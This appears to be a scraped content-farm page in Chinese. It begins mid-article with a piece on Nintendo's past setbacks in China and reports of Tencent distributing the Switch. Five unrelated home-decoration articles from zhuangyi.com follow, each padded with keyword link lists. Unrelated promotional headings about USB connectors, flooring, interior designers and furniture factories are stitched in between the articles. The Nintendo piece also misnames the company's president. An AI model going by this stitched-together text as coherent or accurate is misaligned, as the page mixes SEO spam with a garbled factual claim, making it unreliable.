實際上,任天堂是御三家中最早成立合資公司併發售遊戲機的。2002 年,任天堂入股國內公司神遊科技,並在 2003 年發售了國內第一款遊戲機“神遊機”,是任天堂 N64 的本地版,比索尼 PS2 國行發布還要早一些。

神遊機(圖片來源:神遊科技官網)

  但不管是索尼還是任天堂,在中國市場都舉步維艱,政策上,遊戲機禁令是一頭攔路猛虎,不管是宣發還是銷售,都只能低調行事;市場方面,主機領域,水貨橫行,盜版泛濫,免費的 PC 遊戲佔據了絕大部分市場,電腦單機和主機遊戲都只在夾縫中艱難求生,最終,任天堂和索尼都在中國市場慘敗而歸。

嘗試進入中國失敗后,很長時間內,國外遊戲廠商對中國市場都持有非常謹慎的觀望態度,不會輕易進入中國,遊戲機都執行嚴格的鎖區政策,大量國外廠商開發的主機遊戲都沒有簡體中文語言,中國的主機玩家群體進一步縮減。

長達 14 年的空白,讓中國主機遊戲市場的發育遠遠落後於日本及歐美,雖然遊戲機禁令已經解除了四年,但情況依舊沒有多少好轉,《2018 年中國遊戲產業報告》显示,中國主機遊戲市場銷售額僅占國內遊戲市場的 0.5%。

幾乎每逢任天堂的財報發布會,外界都會詢問任天堂是否有進入中國大陸並開始銷售 Switch 的計劃,在 2018 年 4 月的簡報會上,任天堂總裁谷川俊太郎還表示,雖然很想進入中國市場,但因為“各種各樣的問題”,此事有很大的難度,一方面是政策法規,一方面是中國主機市場很小。

但同時,谷川也表示,任天堂一直在關注和研究中國市場,希望儘快讓中國玩家體驗到任天堂帶來的遊戲樂趣,而且正在和外部公司就相關問題進行協商。

顯然,作為未來任天堂娛樂事業藍圖的中心,Switch 不能眼睜睜看着逐步發展壯大的中國市場完全被索尼和微軟佔據,進入中國的步伐必須加快了。

2019 年 1 月 29 日,Switch 在最新的系統更新中加入對“簡體中文”的支持,現在回過頭看,這也許是 Switch 正式進入中國的前兆,與此同時,任天堂獨佔的第一方遊戲大作幾乎都實現了自帶漢化,大大刺激了 Switch 和任天堂遊戲在國內的銷量。

直到現在,一錘定音,這一次,國行 Switch 恐怕真的要來了。

關了一扇門,開了一扇窗

企查查數據显示,4 月 16 日,騰訊科技(深圳)有限公司經營範圍發生變更,新增遊戲遊藝設備銷售業務,緊接着,爆出騰訊將代理 Switch 的消息。

為什麼是騰訊?

早在 2017 年 10 月,就有媒體稱騰訊將和任天堂聯手,在國內發行 2017 年上半年推出的最新主機 Switch,發售時間為 2018 年,甚至具體到,在和阿里的競爭中,騰訊以保底 200 萬台銷量的協議拿下了 Switch 的國內代理權。

但很快,騰訊遊戲官方就否認了這一消息,原本抱着政治正確黑騰訊的廣大玩家甚至有點感到惋惜。

神奇的是,國內的主機和單機玩家對於騰訊一直懷着又敬又怕的態度,想讓騰訊承擔起國內遊戲第一大廠的責任,讓國內遊戲環境產生一點改變,但又怕這些產品被騰訊代理之後,失掉了原本的味道,變成又一種騙氪的工具。

每當國外市場上有一款口碑佳作或全新硬件設備,而它們又礙於國內政策法規無法順利進入國內市場,玩家又對糟糕的聯機體驗或鎖區鎖服難以忍受的時候,騰訊就會被拎出來,當起玩家心中的“救世主”。

但大部分時候,這些期望都會落空,國外廠商和騰訊之間,多是落花有意,流水無情,部分情況下,騰訊會自己先干起來,學習國外公司的一些先進經驗,在國內搞個類似的出來,填補市場空白,Wegame 就是一個絕好的例子。

Wegame 標語(圖片來源:Wegame 官網)

  騰訊對於 Wegame 的野心是顯而易見的,上線之初,對其寄予厚望,騰訊花費大投入,用來引進 3A 大作和持續上架中小型遊戲,也做出了一些成果,不乏《飢荒》《星露穀物語》這樣的精品遊戲。

但在 3A 大作的引進上,Wegame 屢屢受挫,《怪物獵人:世界》搶先上架又慘遭下架,《絕地求生》至今無法過審,導致 Wegame 至今都是不溫不火,在與 Steam 的競爭上,也很快敗下陣來。

在嚴格的審批、版號面前,即便是騰訊,也束手束腳,無能為力。

比起血腥暴力的 3A 大作,任天堂的遊戲向來都以全年齡段為目標,充滿童真樂趣,比如精靈寶可夢系列,馬里奧系列,塞爾達系列,下至垂髫小兒,上至耄耋老人,都可以享受遊戲帶來的純真樂趣,這樣的遊戲特色,使得任天堂的遊戲更容易過審。

代理 Switch,騰訊可以正式涉足留有大量空白的國內主機市場,把自身強大的渠道能力和老任優秀的遊戲內容結合起來,產生奇妙的化學效果。

優勢互補,門當戶對

為什麼不自己搞一個主機出來?

技術上,這是很簡單的,以騰訊的財力物力,別說一個 Switch,就是下個世代的主機也能分分鐘搞出來,騰訊看上的,一方面是任天堂深耕多年的遊戲原創能力,另一方面,則是 Switch 擁有的廣闊海外市場。

自 2017 年 3 月發布后,Switch 的全球銷量超過了 3200 萬台(截至 2018 年 12 月),遊戲總量達到 1868 款,騰訊自身也有類似《王者榮耀》海外版——《傳說對決》這樣的遊戲上線 Switch,並取得了相當不錯的銷售成績。

傳說對決(圖片來源:遊戲截圖)

  騰訊在某些類型的遊戲上已經具備了相當成熟的自研能力,並不斷以收購、控股等方式布局泛遊戲業務,在內容上,可以和任天堂產生互補,在國內和國外的渠道合作上,也有非常多的可能,可以說,二者能夠相互利用各自在海內外的內容和渠道優勢,達成共贏。

雖然前景樂觀,但困難也是真實存在的,尤其對國內玩家來說,普遍擔心的就是騰訊代理國行 Switch 后,任天堂會不會執行鎖區政策,這與去年完美世界確認代理 Steam 中國時產生的質疑和憂慮是一樣的。

不可否認的是,從玩家層面來講,國內遊戲生態確實在變好,玩家口味更加多樣化,對遊戲性和審美性的追求也在提高,最重要的,正版意識在不斷加強,在國內屢次爆發版權輿論爭論的情況下,更多人對知識產權有了更正面更深刻的認識。

Switch 選在這個時候進入中國,也算是天時、人和齊備,至於地利好不好,也得等到真正進來之後,看遊戲的數量和過審情況,再來評判了。

但總歸,這一步是很有意義的,也是一件好事,畢竟,一個更開放、更多元、競爭激烈的遊戲環境,才能誕生更多優秀的公司和值得掏空錢包的作品。

連一向高冷傲嬌的任天堂都進入中國了,百花齊放的那一天,還會遠嗎?

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【精選推薦文章】

帶您來了解什麼是 USB CONNECTOR  ?

為什麼 USB CONNECTOR 是電子產業重要的元件?

又掌控什麼技術要點? 帶您認識其相關發展及效能

網紅裝修風格來襲!夏日颳起一陣簡約清新裝修風

網紅裝修風格來襲!夏日颳起一陣簡約清新裝修風

來自:www.zhuangyi.com
日期:2018-07-07 11:11:38
近幾年來,北歐風佔據了裝修風格中的半壁江山,簡約大氣,深受年輕人追捧,一時之間,大白牆、高腳沙發、黑白配成了主流,北歐風格也成為了網紅裝修風格。其實,在夏季,最受歡迎的還是清新簡約風,忙碌了一天的你回到家一陣清新撲了你滿懷,是不是頓時幸福感爆棚呢?下面裝一網小編帶大家欣賞簡約清新風裝修案例。

簡約清新裝修風不僅僅是視覺上的盛宴,更給人帶來舒適便利的感覺,簡約不簡單,美觀又實用才是硬道理。在這個空間里,有很多傢具實用小技巧,這才是真正的網紅裝修風格,下面和小編共同欣賞下吧。

房屋平面圖,小三居,兩衛。

一進門,非常簡單的玄關,設計了換鞋區域,壁櫃的設計,增加了儲物空間,讓家居生活更整潔和便利。

整個客廳色彩很素雅,檸檬黃抱枕為空間增添了一絲可愛的韻味,一點也不突兀。

簡單的裝飾斗櫃配上木質的茶几,北歐感覺的沙發,空間顯得圓潤而舒適。斗櫃的設計簡單大方,增加了儲物空間,復古的擺設顯得安靜、自然。

實木餐桌與地板交相輝映,簡潔大方,馬卡龍色的掛畫很少女很清新。

陽台改造成了簡單的書房,很巧妙的利用了桌子上方的牆面空間,簡單的書櫃、柔和的燈光、紗簾都是一副歲月靜好的模樣。

廚房具有現代化氣息,深色實木櫥櫃配上淺色的牆磚,視覺上很舒適。

衛生間也同樣現代化,鏡面櫃和洗面櫃具有強大的儲物空間,是小戶型衛生間裝修設計的一個典範。

主卧充滿設計感的吊燈,作為了床頭背景牆,充滿線條感的同時也為空間帶來一絲光線,飄窗簡單又安靜。

次卧色調以藍色為主,寧靜和諧。

次卧色調柔和,木質掛畫顯得低調有內涵,衣櫃線條流暢,簡約大方。

上述內容為轉載或編者觀點,不代表裝一網意見,不承擔任何法律責任。如侵權請聯繫刪除。

相關推薦

  • 簡約的裝修風格
  • 簡約客廳裝修
  • 裝修風格
  • 裝修風格大全
  • 裝修風格分類
  • 裝修風格圖片
  • 裝修風格有哪些
  • 美式裝修風格樣板間
  • 歐式裝修風格
  • 服裝店裝修風格
  • 童裝店裝修風格
  • 現代裝修風格
  • 后現代裝修風格
  • 室內裝修風格
  • 別墅裝修風格
  • 新古典裝修風格
  • 小戶型裝修風格
  • 客廳裝修風格
  • 會所裝修風格
  • 會議室裝修風格
  • 咖啡廳裝修風格
  • 古典裝修風格
  • 中式古典裝修風格
  • 東南亞裝修風格

延伸閱讀

  • 夏日最美輕奢風來襲!華麗與舒適共存的裝修風格
  • 北歐風親吻地中海 90平混搭風格裝修清新文藝家
  • 今秋家居裝修流行趨勢 簡約清新風格成主流
  • 辦公室裝修 簡約清新的“清美學”風格
  • 夏日裝修最愛小清新 70平兩室一廳時尚小屋
  • 工業風格小面積餐廳裝修效果圖 超上相的網紅店設計
  • 10萬90平米裝修成功打造夏日清爽田園風
  • 領略台式小清新設計風格 品輕快簡約工業風味美家
  • 用了E0級板材真的環保嗎?來看看E0級板材甲醛釋放量多少
  • 硅藻泥怎麼施工?五分鐘教你學會硅藻泥施工步驟
  • 進門鞋櫃怎麼裝修最合理?裝修網列舉圖片來說明
  • 5平米小餐廳怎麼裝修好看?裝修網分享餐廳裝修設計技巧

本站聲明:網站內容來源於裝修網http://www.zhuangyi.com/,如有侵權,請聯繫我們

【木地板裝潢施工分享】

實木地板、海島型地板、耐磨地板怎麼挑? 木地板三倍價差的秘密!!

分享木質地板DIY自行施工教學影片

木地板哪有幾種款式?該如何選購適合的材質呢?

門外漢也要知道的超耐磨木地板祕辛?

裝修中高顏值色彩搭配 洋氣色讓你變“好色之徒”

裝修中高顏值色彩搭配 洋氣色讓你變“好色之徒”

來自:www.zhuangyi.com
日期:2018-07-07 12:32:50
說起裝修,色彩搭配一直是不變的主題,無論什麼風格,什麼材料,首先映入人眼帘的就是顏色,顏色太單一顯得單調;顏色太複雜讓人眼花繚亂;顏色太輕彷彿住進毛坯房;顏色太重好像進入電影院……如此令人頭疼,其實還是沒選對一些“洋氣色”,裝一網小編帶大家了解下在裝修中不同顏色能搭配出什麼樣的效果。

今年流行的高級灰、茱萸粉、祖母綠、紺青……不明覺厲,在裝修中這些“洋氣色”如果搭配起來,讓你家的顏值馬上到巔峰,那麼如何搭配呢?這就需要你秒變“好色之徒”,大膽選擇色調,和裝一網小編一起來研究裝修中如何運用色彩搭配吧。

1、雅黑+乳白=低調

黑白搭配是最萬能的了,運用到家裝中,是北歐風格的首選,黑色面積不要太大,以白色為主,黑色起到點綴作用,這樣整個空間才能看起來簡約不簡單,深沉不古板,若大面積使用黑色,會使空間顯得沉悶壓抑。

2、高級灰+原木=純粹

原木色是大自然的顏色,在家裝中運用原木色元素,使整個空間有回歸自然之感。久居城市喧囂,常常會嚮往自然的寧靜,高級灰典雅、低調,與原木色搭配,顯得寧靜純粹。

3、茱萸粉+紺青=優雅

粉色環境清新優雅,茱萸粉更是飽和度低,給人一種軟軟的感覺,幾抹紺青作為點綴,整個空間優雅和諧。紺青莊重,加上天鵝絨質地,更為高貴典雅,二者結合可打造出輕奢風之感。

4、祖母綠+象牙黑=率性

祖母綠大氣,象牙黑沉重,原本不搭的兩個顏色碰撞擦出了激烈的火花,運用到餐廳里,使整個環境明快起來。祖母綠的甲殼蟲餐椅搭配立柱黑色圓桌,呈現出一派自然而慵懶的率性。

5、檸檬黃+薄荷綠=俏皮

藤條餐椅上的淡藍色坐墊、四周薄荷綠的牆壁,檸檬黃凳子,呈現出一片生機勃勃之態。作為玄關來講可以說是很優秀的了,搭配出清新又甜美的感覺,讓人看了心情大好。

6、高級灰+胭脂粉=浪漫

在這個空間里,粉色和灰色撞色的牆紙簡直把灰色和粉色的韻味搭配得恰好,看起來特別和諧大氣。在與粉色搭配之時,灰色的色調更為緩和一些,沒有過多的刺激性對比。

7、薄荷綠+清新粉=溫柔

大概這就是如沐春風的感覺了吧,薄荷綠可做點綴,讓空間俏皮活潑,粉色又是溫柔的,二者中和,散發出春天的氣息。

上述內容為轉載或編者觀點,不代表裝一網意見,不承擔任何法律責任。如侵權請聯繫刪除。

相關推薦

  • 裝修風格
  • 裝修風格大全
  • 裝修風格分類
  • 裝修風格圖片
  • 裝修風格有哪些
  • 美式裝修風格樣板間
  • 歐式裝修風格
  • 裝修預算
  • 裝修預算表
  • 裝修預算清單
  • 家庭裝修預算
  • 80平米裝修預算
  • 90平米裝修預算
  • 100平米裝修預算
  • 裝修合同
  • 裝修合同樣本
  • 裝修合同範本
  • 房屋裝修合同
  • 裝修合同注意事項
  • 裝修合同書
  • 家庭裝修合同
  • 裝修水電改造
  • 裝修注意事項
  • 裝修注意事項及細節

延伸閱讀

  • 牆面也要高顏值! 裝一網淺析家居牆紙色彩花紋搭配
  • 開放衣櫃&獨立衣櫃顏值太高 5款卧室衣櫃裝修效果圖
  • 廚房裝修這些地方別忽視 小技巧打造高顏值空間
  • 體育館裝修設計很重要 拒絕高顏值體育館都在別人家
  • 顏值不夠燈飾來湊 創意燈飾設計讓你家變得高逼格
  • 現代美式風格高顏值,125㎡三居室裝修設計美翻天
  • 兼備顏值和功能 窗帘裝修效果圖教你搭配秘訣
  • 陽台變書房顏值飆升 113㎡北歐風格三居室
  • 用了E0級板材真的環保嗎?來看看E0級板材甲醛釋放量多少
  • 硅藻泥怎麼施工?五分鐘教你學會硅藻泥施工步驟
  • 進門鞋櫃怎麼裝修最合理?裝修網列舉圖片來說明
  • 5平米小餐廳怎麼裝修好看?裝修網分享餐廳裝修設計技巧

本站聲明:網站內容來源於裝修網http://www.zhuangyi.com/,如有侵權,請聯繫我們

【木地板裝潢施工分享】

地板施工造成其他裝潢有瑕疵該如何補救?

柚木地板是什麼,其材料規格及適合施作環境?

了解海島型木地板是否會有潮濕變形疑慮?

井柏然倪妮相忘於江湖 探尋井寶文藝高級的家裝風

井柏然倪妮相忘於江湖 探尋井寶文藝高級的家裝風

來自:www.zhuangyi.com
日期:2018-07-07 14:17:09
井柏然倪妮分手不由得令人惋惜,畢竟花少里井柏然倪妮的告別之吻也是浪漫至極,不過,既然和平分開,看客自然不好說什麼,以後相見各道一聲珍重又何嘗不好。說到花少,不知道大家是否關注過井柏然家,那高級文藝的性冷淡風小編真的是非常心水了,下面小編就帶大家一起探尋一下井寶文藝高級的家裝風吧。

井柏然的家可謂是極具設計感了,文藝、高級、氣質、寧靜,小編帶大家領略這幾個詞彙是如何融入到井柏然的家裝風格的。

水泥牆壁奠定了濃濃的工業風基調,黑色皮質沙發,霧霾藍色質感地毯,金屬色鐵藝檯燈,體現出硬朗而寧靜的高級感。

敞亮寬闊的房間里,品着一杯香氣濃郁的咖啡,在一個安靜的角落捧書閱讀,文藝的氣質再也遮掩不住。

旋轉式的水泥樓梯,衝破了傳統的規則感,簡約卻絲毫不簡單,似乎在努力的追求屬於自己的那份個性與張揚。

如果說之前的設計體現的是冷淡的,疏離的,那麼壁爐和餐桌這裏就流露出了熱氣騰騰的煙火氣,遺世獨立卻又可回歸世俗,真好。

無論在外面精力了怎樣的風雨侵襲,回到家中都能找到真實的自我,這就是家所帶來的真正含義吧。“家是一個可以把自己的東西表現出來的空間,你可以不用再去扮演,或者不用再依照別人的期望去做,”一如井柏然所說。

小編想說,溫馨才是最有力量的。投入了真實熱愛的家,在你卸下堅硬的盔甲后,會被回報以溫暖。

上述內容為轉載或編者觀點,不代表裝一網意見,不承擔任何法律責任。如侵權請聯繫刪除。

相關推薦

  • 高級美容院裝修

延伸閱讀

  • 井柏然親自設計3000萬豪宅 工業風裝修風格一酷到底
  • 家裝江湖英雄輩出
  • 北國靜謐優然氣息 簡約現代風家居推薦
  • 2013年新古典風強勁 滿屋瀰漫文藝韻味
  • 我們終將逝去的青春 盤點那些文藝家居風
  • 文藝海軍風席捲80平地中海風格裝修
  • 北歐風親吻地中海 90平混搭風格裝修清新文藝家
  • 北歐簡約風複式大公寓 清雅素凈文藝范兒十足
  • 用了E0級板材真的環保嗎?來看看E0級板材甲醛釋放量多少
  • 硅藻泥怎麼施工?五分鐘教你學會硅藻泥施工步驟
  • 進門鞋櫃怎麼裝修最合理?裝修網列舉圖片來說明
  • 5平米小餐廳怎麼裝修好看?裝修網分享餐廳裝修設計技巧

本站聲明:網站內容來源於裝修網http://www.zhuangyi.com/,如有侵權,請聯繫我們

【室內裝潢設計廠商推薦】

新屋購入,尋找台中室內設計師?是否可先免費估價丈量?

想要打造簡約、淡雅兼且收納空間的小資房,台中室內設計推薦哪一家?

中古屋大改造,分享台中室內設計公司隔間重新規劃,擴大實用空間!

你還在花冤枉錢?裝修中這些地方需要省錢

你還在花冤枉錢?裝修中這些地方需要省錢

來自:www.zhuangyi.com
日期:2018-07-07 15:16:47
買房子是一筆大開支,有的人東拼西湊,有的甚至負債累累,有的則是要還大半輩子房貸。買完房子還要裝修,裝修也是一筆大開銷,在裝修中,很多人都花了冤枉錢,其實有很多地方是可以省錢的,我們要本着勤儉節約也能裝出美家的宗旨,不花冤枉錢,裝一網小編整理了裝修中需要省錢的地方,趕快標記吧。

裝修是一個漫長的過程,在裝修前要了解的知識有很多,在裝修時處處都要花錢買東西,有些東西不能省,有些東西能省則省,不然的話,花了冤枉錢不說還不實用。因此我們在裝修前了解一些消費知識點,哪些地方需要省錢是非常有必要的。

1、牆面磚

牆面磚只作為裝飾作用,不易受到磕碰磨損,如果你不是土豪的話,用好的品牌特價款就妥妥的了。

2、塗料

塗料的水很深,不管環保專家說的再天花亂墜,最主要就是環保無甲醛,用好品牌的平價款即可,健康第一位,塗出來的效果也差別不大。

3、傢具

有的人追求生活品質,喜歡實木傢具,但是價格實在是高,搬回家裡碰也碰不得,用也不捨得,最主要的是不好打理。所以在選擇傢具時,選擇健康無污染又美觀的板材即可。

4、移門

在很多簡約系裝修風格中,很多人選擇在家裡安裝移門,顯得高端大氣上檔次。其實移門最主要的是看導軌,而大多數導軌質量是不好的,容易壞,給生活帶來了許多不便。

5、水晶燈

在現代許多年輕人眼裡,水晶燈似乎是辣眼睛的存在了吧?華而不實,不易清潔,如果與整體風格不搭的話,極易產生不倫不類的效果。

6、吊頂

花樣精緻的吊頂華而不實,也會顯得空間壓抑累贅,所以選最便宜的鋁扣板就好了。

其實,在裝修中,最該花錢的地方就是家用電器了,它關乎着整個家庭的安慰,所以在其他方面省省吧,留着買好的家用電器,體驗感還是不錯的。

上述內容為轉載或編者觀點,不代表裝一網意見,不承擔任何法律責任。如侵權請聯繫刪除。

相關推薦

  • 花店裝修
  • 裝修婚房多少錢
  • 裝修沙子多少錢一噸
  • 90平米裝修多少錢
  • 100平米裝修多少錢
  • 110平米裝修多少錢
  • 120平米裝修多少錢
  • 130平米裝修多少錢
  • 140平米裝修多少錢
  • 水泥多少錢一噸
  • 水電改造多少錢
  • 舊房翻新多少錢
  • 裝修風格
  • 裝修風格大全
  • 裝修風格分類
  • 裝修風格圖片
  • 裝修風格有哪些
  • 美式裝修風格樣板間
  • 歐式裝修風格
  • 裝修預算
  • 裝修預算表
  • 裝修預算清單
  • 家庭裝修預算
  • 80平米裝修預算

延伸閱讀

  • 房間裝修尺寸詳細解析 業主新房裝修不花冤枉錢
  • 四個妙招 教您裝修預算不花冤枉錢
  • 審查裝修預算掌握科學方法 避免花“冤枉錢”
  • 手把手教你怎麼做好衛浴裝修預算 不花冤枉錢
  • 夏天別再花冤枉錢 空調省電溫度省電方法技巧
  • 定製家居市場火熱花樣多 消費者要認清避免花冤枉錢
  • 2018年裝修躲開這些雷區 低價套餐要錢的地方在後頭
  • 房屋裝修防水區域不僅僅只有衛生間 這些地方也需要
  • 用了E0級板材真的環保嗎?來看看E0級板材甲醛釋放量多少
  • 硅藻泥怎麼施工?五分鐘教你學會硅藻泥施工步驟
  • 進門鞋櫃怎麼裝修最合理?裝修網列舉圖片來說明
  • 5平米小餐廳怎麼裝修好看?裝修網分享餐廳裝修設計技巧

本站聲明:網站內容來源於裝修網http://www.zhuangyi.com/,如有侵權,請聯繫我們

【室內裝潢設計廠商推薦】

打造新奇、好玩、舒服的辦公空間,該如何找人設計?

最酷的辦公室設計在這裡!!

裝修公司太難選!想試試自己裝修結果扎心了

裝修公司太難選!想試試自己裝修結果扎心了

來自:www.zhuangyi.com
日期:2018-07-07 16:44:07
很多人認為搞裝修就找幾個叔叔伯伯幫忙就好了,真的有這麼簡單嗎?從預算設計到開工,從買材料到走水電,再到請各種工人,每個步驟都是繁瑣而複雜的。加上是個裝修知識新人入門級小白,個人裝修的話風險太大,怕裝出的畫面太美我不敢看,所以很多人選擇裝修公司,那麼問題來了,個人裝修好還是找裝修公司?裝一網小編帶大家分析一下。

裝修的話很複雜,它不是一蹴而就的,而是一個循序漸進的過程,且固定的流程必須要走每一部都不能省,選擇個人裝修,你要是不知道什麼地方用什麼材質,且無裝修經驗的話,那麼就等着被坑吧。一些口碑較好的裝修公司能幫你省去不少的麻煩,裝一網可以推薦給您合適的裝修公司,個人裝修有很多弊端,小編一一舉例說明。

1、 浪費材料

裝修時往往要多餘很多材料,如果你自己裝,不知道買多少材料,買少了不夠用,買多了用不完又不能再退回去,最後浪費不少材料。相較於自己裝修,正規的裝修公司在材料預估上更有經驗。根據用量來購買材料,能省下一筆不小的費用!

2、 浪費時間

找工人、買材料、盯裝修……哪一項不是大工程?除非你每天處於閑置狀態,工作和裝修不可兼得,最後搞得身心疲憊,也完全拉長了戰線。現如今正規的裝修公司從施工到驗房專人服務都是很專業的,而且現在也可以微信查看工地進程,方便省心。

3、 浪費金錢

裝修裝的不是家,是錢!首先要買材料,自己去買都是市場價,裝修公司去買或許還是市場價,加上中間自己所消耗的時間,都是金錢啊,所以孰輕孰重自己可以掂量下。

4、 浪費人力

自己裝修大多是找親戚朋友,我們來算筆賬,幾個月下來,吃飯費用、住宿費用、茶水費用、甚至加上完工后的感謝費,可不是一筆小數目。而且易產生工種之間責任不清,裝出的效果好了就不說什麼了,要是不好的話又是一場糾纏……

5、 效果不好

除非你是設計師出身,否則裝出來的效果還是會與理想狀態有所出入的。一套房要住好多年,要是效果不好豈不是扎心了?但你要是土豪的話,可以拆了重裝!

上述內容為轉載或編者觀點,不代表裝一網意見,不承擔任何法律責任。如侵權請聯繫刪除。

相關推薦

  • 公司形象牆裝修
  • 北京裝修公司排名
  • 上海裝修公司哪家好
  • 重慶裝修公司哪家好
  • 蘇州裝修公司排名
  • 鄭州裝修公司排名
  • 成都裝修公司排名
  • 廣州裝修公司哪家好
  • 深圳裝修公司哪家好
  • 武漢裝修公司哪家好
  • 十大裝修公司排名
  • 裝修風格
  • 裝修風格大全
  • 裝修風格分類
  • 裝修風格圖片
  • 裝修風格有哪些
  • 美式裝修風格樣板間
  • 歐式裝修風格
  • 裝修預算
  • 裝修預算表
  • 裝修預算清單
  • 家庭裝修預算
  • 80平米裝修預算
  • 90平米裝修預算

延伸閱讀

  • 2017年家居圈6大扎心現象回顧 跑路不合格拋棄等
  • 紅木樹種鑒定難揭秘鑒定流程 結果可精確到類別
  • 想要韓國偶像劇里的夢幻小家 不妨試試這些裝修方法
  • 水電施工想降低預算並不難 裝修網教您做裝修聰明人
  • 北京工商局移動插座商品抽檢結果 禾太電器等上黑榜
  • 門鎖怎麼選?選門鎖時注意這些 小偷想不下崗都難
  • 家裝不為人知東西太多 互聯網家裝難實現標準化
  • 新房裝修設計想好再開始 第一步先驗房再選設計師
  • 用了E0級板材真的環保嗎?來看看E0級板材甲醛釋放量多少
  • 硅藻泥怎麼施工?五分鐘教你學會硅藻泥施工步驟
  • 進門鞋櫃怎麼裝修最合理?裝修網列舉圖片來說明
  • 5平米小餐廳怎麼裝修好看?裝修網分享餐廳裝修設計技巧

本站聲明:網站內容來源於裝修網http://www.zhuangyi.com/,如有侵權,請聯繫我們

【磁磚設計與裝修美學相關資訊】

挑好磚一點都不難!馬賽克磚挑選眉角小撇步!

浴室設計小心機,利用馬賽克磁磚,放大你的浴室空間

想改變客廳裝潢風格嗎? 馬賽克拼貼打造溫馨鄉村風,教你如何運用馬賽克瓷磚自行DIY創作

日式禪意裝修風 以茶當酒 許你溫柔歲月

日式禪意裝修風 以茶當酒 許你溫柔歲月

來自:www.zhuangyi.com
日期:2018-07-07 17:21:22
我們都知道,茶與意境息息相關,常說品茶,即在特定的環境下品味茶的繾綣一生。飲茶因能清心寡慾、養氣頤神,故有“茶中帶禪、茶禪一味”之說。近幾年,日式禪意裝修風頗為流行,充滿意境的空間讓人放下了那顆浮躁的心,靜靜度過這悠悠歲月。

現在隨着生活腳步的加快,人們的壓力也越來越大,都渴望有自己的一片寧靜空間,日式禪意裝修風格在近幾年流行起來,把家裡布置的充滿禪意,回到家,好像整個世界都放鬆了起來,何樂而不為呢?裝一網小編帶大家了解下日式禪意裝修風。

客廳淡妝濃抹,雲淡風輕,大道至簡,禪意至深。

茶室不大,但足夠讓你細細品味。

茶是溫柔的,不如酒濃烈,卻令人回味無窮。我以茶代酒,許你溫柔歲月,是最動聽的情話。

厭倦了城市的喧囂,將心安放於淡淡的氛圍,如此簡單,便好。

月洞門很好的體現了日式風格也,精緻、趣味。

電視背景牆沒有過多裝飾,過道處放置可開合的日式移門,日式裝修風格元素滿滿,典雅靜謐。

餐廳的卡座設計是亮點,在很大程度上節約了空間。整體原木色風格讓人回歸自然,簡單純樸。

廚房簡單實用,非常精緻,彰顯主人品味。

被卧室的色調撞了一臉溫柔,在這個靜謐的空間里,歲月靜好,你盡情享受就好。

一點一滴的設計,都體現出了滿滿的禪意,禪茶一味,學會放下,學會感悟。

上述內容為轉載或編者觀點,不代表裝一網意見,不承擔任何法律責任。如侵權請聯繫刪除。

相關推薦

  • 美式裝修風格樣板間
  • 歐式裝修風格
  • 複式樓梯裝修
  • 小複式公寓裝修
  • 倒複式裝修
  • 哥特式裝修風格
  • 開放式廚房
  • 開放式廚房好不好
  • 開放式書房
  • 步入式衣帽間
  • 開放式衣帽間
  • 複式改造
  • 歐式客廳
  • 換鞋凳式鞋櫃
  • 歐式電視背景牆
  • 掛壁式魚缸
  • 分離式衛生間
  • 裝修風格
  • 裝修風格大全
  • 裝修風格分類
  • 裝修風格圖片
  • 裝修風格有哪些
  • 裝修預算
  • 裝修預算表

延伸閱讀

  • 日式陽台設計超有禪意 119㎡三居室裝修實景
  • 原木色實木元素營造禪意情調 日式風格設計清雅素凈
  • 茶亦醉人何必酒 六大茶館商鋪裝修風格讓你醉
  • 簡約禪意家!曬105㎡日式風格裝修三居室實景案例
  • 極簡中式風格禪意優雅 138㎡三室兩廳裝修實景案例
  • 158平四居室改三居 新中式風格裝修展東方禪意魅力
  • 半開放廚房+禪意茶室魅力高 118㎡現代風格裝修
  • 日本120㎡的木質舒適窩 二手房翻新禪意居所
  • 用了E0級板材真的環保嗎?來看看E0級板材甲醛釋放量多少
  • 硅藻泥怎麼施工?五分鐘教你學會硅藻泥施工步驟
  • 進門鞋櫃怎麼裝修最合理?裝修網列舉圖片來說明
  • 5平米小餐廳怎麼裝修好看?裝修網分享餐廳裝修設計技巧

本站聲明:網站內容來源於裝修網http://www.zhuangyi.com/,如有侵權,請聯繫我們

【居家裝修精選推薦】

想知道北部最多平價、庫存出清的家具工廠推薦在哪裡?

屬於你的居家品味,家具訂製工廠推薦與心得分享

打造北歐風,連設計師也極力讚許的古典家具推薦工廠

好評熱賣,復刻家具推薦首選口袋名單

裝潢省錢妙招,家具訂製推薦達人,教您省下不必要的裝潢

家具設計推薦設計師,評論常見十大居家設計風格